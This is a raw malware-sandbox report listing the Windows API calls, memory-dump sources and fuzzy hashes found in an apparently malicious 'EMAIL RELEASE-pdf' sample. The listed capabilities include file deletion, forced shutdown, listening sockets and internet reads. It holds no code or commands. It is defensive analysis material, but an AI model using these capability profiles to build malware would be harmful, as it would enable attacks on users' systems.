                                                                                                          • API String ID: 4002782344-1173974218
                                                                                                          • Opcode ID: 0d6474eaec469b7df43489f522cd8e1ff03390093b53299201ba4b008f9dfd27
                                                                                                          • Instruction ID: ad83efc730a872e3907d292241f46029979fda1e90337caabcaf4eab239140aa
                                                                                                          • Opcode Fuzzy Hash: 0d6474eaec469b7df43489f522cd8e1ff03390093b53299201ba4b008f9dfd27
                                                                                                          • Instruction Fuzzy Hash: 39518F3180514CEACF05EBA0D996AFDB778AF14305F604069E806B71A2EF796F4DCB61
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007BF440
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 007BF470
                                                                                                          • _wcscmp.LIBCMT ref: 007BF484
                                                                                                          • _wcscmp.LIBCMT ref: 007BF49F
                                                                                                          • FindNextFileW.KERNEL32(?,?), ref: 007BF53D
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF553
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 713712311-438819550
                                                                                                          • Opcode ID: 311c47a1a52dde2019cd0a9861bbba8b4184fe867341b87161f9b697334107df
                                                                                                          • Instruction ID: 1f719cb5c8d76e43bff099f5b773c2b211cbf0aa62fa66d58eab9c1cb704d899
                                                                                                          • Opcode Fuzzy Hash: 311c47a1a52dde2019cd0a9861bbba8b4184fe867341b87161f9b697334107df
                                                                                                          • Instruction Fuzzy Hash: 67415C7190021AEFCF14EF64DC49BEEBBB8FF05710F144566E855A3291DB389A94CB60
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __itow__swprintf
                                                                                                          • String ID: 3cv$_v
                                                                                                          • API String ID: 674341424-436345795
                                                                                                          • Opcode ID: eef835452a597df841d85b360b9e43034128c3a97d610cc7df47b0d5fbb63380
                                                                                                          • Instruction ID: 78a3d1084299a04db56083b9b88bfcd635f98b64b061fddbdb0fcee73c9deb25
                                                                                                          • Opcode Fuzzy Hash: eef835452a597df841d85b360b9e43034128c3a97d610cc7df47b0d5fbb63380
                                                                                                          • Instruction Fuzzy Hash: AC22BE71608340DFDB24DF24D885BAEB7E5BF85700F004A1DF99A97291DB79E908CB92
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: df82a9af2e8cc5fbf876eceb4942a2700247a413e2fb0da359e790e0068e95d3
                                                                                                          • Instruction ID: 84c09be4c4ceef14fb8eb7d0720819716963dcfc9935362d5fca9f316628607e
                                                                                                          • Opcode Fuzzy Hash: df82a9af2e8cc5fbf876eceb4942a2700247a413e2fb0da359e790e0068e95d3
                                                                                                          • Instruction Fuzzy Hash: 73129B70A00609DFDF04DFA5D985AEEB7F5FF48300F108629E806A7251EB79AD14DB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                            • Part of subcall function 007B4A31: GetFileAttributesW.KERNEL32(?,007B370B), ref: 007B4A32
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007B3B89
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 007B3BD9
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B3BEA
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007B3C01
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007B3C0A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                          • Opcode ID: e5b2ff01a0abb63194182e7b9cb773248346fce217be1dab0e46de783e99658b
                                                                                                          • Instruction ID: cd4840fa739c3cf8125e0b82a63a0d1ac3ea1c94f19cdd0c6fff30b31f0efb2e
                                                                                                          • Opcode Fuzzy Hash: e5b2ff01a0abb63194182e7b9cb773248346fce217be1dab0e46de783e99658b
                                                                                                          • Instruction Fuzzy Hash: 89319071009384DFC304EF64D8999EFBBA8BE91305F404E2DF8D5921A1EB699A0CC767
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A882B
                                                                                                            • Part of subcall function 007A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8858
                                                                                                            • Part of subcall function 007A87E1: GetLastError.KERNEL32 ref: 007A8865
                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 007B51F9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                          • API String ID: 2234035333-194228
                                                                                                          • Opcode ID: 8f49da3a4a5d32fabebe98b7a6842613e1be160e41b63053c9d00f6e26dbfcb9
                                                                                                          • Instruction ID: e59b39be95379b7d6f0761f34ddf0ca0c62693c9294c0fd9d60af03f3fac65c3
                                                                                                          • Opcode Fuzzy Hash: 8f49da3a4a5d32fabebe98b7a6842613e1be160e41b63053c9d00f6e26dbfcb9
                                                                                                          • Instruction Fuzzy Hash: 4101F2B1793615ABE7286268AC8BFFA7368FB05340F240525F953E20D2DA7D1C0086A4
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C62DC
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C62EB
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 007C6307
                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 007C6316
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C6330
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 007C6344
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279440585-0
                                                                                                          • Opcode ID: 94341efd229e89a48fae0c93de7290328efa922188e5b1b1e6193056ff2fcd9c
                                                                                                          • Instruction ID: a225360485359f7f20ae793f54fe87ce6542110982a190b85679fb85181b8fcf
                                                                                                          • Opcode Fuzzy Hash: 94341efd229e89a48fae0c93de7290328efa922188e5b1b1e6193056ff2fcd9c
                                                                                                          • Instruction Fuzzy Hash: A9219E71600204DFCB10EF64CC89FAEB7B9EF49721F14815DE916A7291CB78AD05CB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                          • _memmove.LIBCMT ref: 007A0258
                                                                                                          • _memmove.LIBCMT ref: 007A036D
                                                                                                          • _memmove.LIBCMT ref: 007A0414
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 1300846289-0
                                                                                                          • Opcode ID: 1c0ffd44fd3b7fcb3a03956cac4ebdaa5897431fcb8844a8443a62559018b67f
                                                                                                          • Instruction ID: 39b4ca4bc9b649e9ef65f962530ba03d9462d7602dc4e61fcbabfd3c86a94f93
                                                                                                          • Opcode Fuzzy Hash: 1c0ffd44fd3b7fcb3a03956cac4ebdaa5897431fcb8844a8443a62559018b67f
                                                                                                          • Instruction Fuzzy Hash: B902DFB0A00209DFCF04DF64D985AAEBBB5FF85300F548469E80ADB291EB79DD54CB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 007519FA
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00751A4E
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00751A61
                                                                                                            • Part of subcall function 00751290: DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorProc$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3744519093-0
                                                                                                          • Opcode ID: 1b2d036a9a62e2c28ca6c1ce37f6bdd7c258ec40daf572e086c30aed1e43f605
                                                                                                          • Instruction ID: 525d74bdab89edff5f24745d8c41d821bd56d391d8125b1c7100de344a8fe07a
                                                                                                          • Opcode Fuzzy Hash: 1b2d036a9a62e2c28ca6c1ce37f6bdd7c258ec40daf572e086c30aed1e43f605
                                                                                                          • Instruction Fuzzy Hash: 73A15D75102585FAD62ABB384C48FFF266CDF42343B94811AFD02D1192DBACAD09D3B2
                                                                                                          APIs
                                                                                                            • Part of subcall function 007C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C7DB6
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007C679E
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C67C7
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 007C6800
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C680D
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 007C6821
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 99427753-0
                                                                                                          • Opcode ID: 36bf5ee9e5fbd3a13da8bc8f1eb27f1d0ce4aa4f03df0d3c5eabd4acc8e89401
                                                                                                          • Instruction ID: 22ae31fdde398cef95695c78cc6a4af162699b1ed9b5a74226e041970d79c73f
                                                                                                          • Opcode Fuzzy Hash: 36bf5ee9e5fbd3a13da8bc8f1eb27f1d0ce4aa4f03df0d3c5eabd4acc8e89401
                                                                                                          • Instruction Fuzzy Hash: 8041B775B00204EFDB50AF248C8AFAE77E49B45714F04845CFE16AB3D2CAB8AD048B91
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: e449c47a9896d36b7fd2bcb28476d4c6f6381e14de10f11a6b3eb7b135cfc182
                                                                                                          • Instruction ID: 430eaf7c51805fa0dc598161bb53471d94c08395e6d478bee731a8278a3f56bb
                                                                                                          • Opcode Fuzzy Hash: e449c47a9896d36b7fd2bcb28476d4c6f6381e14de10f11a6b3eb7b135cfc182
                                                                                                          • Instruction Fuzzy Hash: D611C8317015119FDB215F26DC48A6E7BB9EF447A5B44842BF846D7341CBBCDD018AA4
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A80C0
                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A80CA
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A80D9
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A80E0
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A80F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                          • Instruction ID: 2369b0c21071eddf2fe8de9b51206cc66b20f6357824059c43e6b0a1e3a9881b
                                                                                                          • Opcode Fuzzy Hash: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                          • Instruction Fuzzy Hash: 4FF06231241208AFEB101FA5EC8DE673BBCEF8A755B14412AF946C7150CB699D41DA61
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00754AD0), ref: 00754B45
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00754B57
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                          • API String ID: 2574300362-192647395
                                                                                                          • Opcode ID: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                                                                                                          • Instruction ID: fab69a46c42d257dd0acabb9442a2cbdf4050659b6a75d53d56a6548e25a1c7b
                                                                                                          • Opcode Fuzzy Hash: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                                                                                                          • Instruction Fuzzy Hash: 47D0C2B0A00717DFC7208F31D818B4272F4AF01341B14C83BD883D2250D7B8D4C0C618
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 007CEE3D
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 007CEE4B
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 007CEF0B
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007CEF1A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2576544623-0
                                                                                                          • Opcode ID: 05054ac415bb8abf6c6bc4d447acdf3b3469ff1986c0c46affc6994e3ee6571e
                                                                                                          • Instruction ID: c85041aa51a1a964b7c1bbeb5a06ea1e13cda6001512f0c1ab9176442e93dfa0
                                                                                                          • Opcode Fuzzy Hash: 05054ac415bb8abf6c6bc4d447acdf3b3469ff1986c0c46affc6994e3ee6571e
                                                                                                          • Instruction Fuzzy Hash: BA518E71504701EFD310EF24DC89EABB7E8EF94750F10482DF995972A1EBB4A908CB92
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007AE628
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen
                                                                                                          • String ID: ($|
                                                                                                          • API String ID: 1659193697-1631851259
                                                                                                          • Opcode ID: d5aa16c7fae1a7ca9946632028bd393bb6875273faee33c82b7ac6036204e747
                                                                                                          • Instruction ID: 244a026bcc675044eb11c4efb7e07ff912f5d4fd33cc38461bce8b3c2fc38044
                                                                                                          • Opcode Fuzzy Hash: d5aa16c7fae1a7ca9946632028bd393bb6875273faee33c82b7ac6036204e747
                                                                                                          • Instruction Fuzzy Hash: 55322375A00705DFDB28CF59C481A6AB7F0FF89320B15C56EE89ADB3A1E774A941CB40
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007C180A,00000000), ref: 007C23E1
                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C2418
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 599397726-0
                                                                                                          • Opcode ID: e47da870ff2452e775e762b1a43e5d9231c8ae403a29f717ded57e02c03e2ef9
                                                                                                          • Instruction ID: 1bee6e7a9023521a0704b135557d9b29a44dc2431844862c8076cd6324a00b63
                                                                                                          • Opcode Fuzzy Hash: e47da870ff2452e775e762b1a43e5d9231c8ae403a29f717ded57e02c03e2ef9
                                                                                                          • Instruction Fuzzy Hash: FB41D471A04249FFEB10DE95DC85FBB77BDEB40724F10806EF605A6142DB7C9E429650
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007BB343
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BB39D
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BB3EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
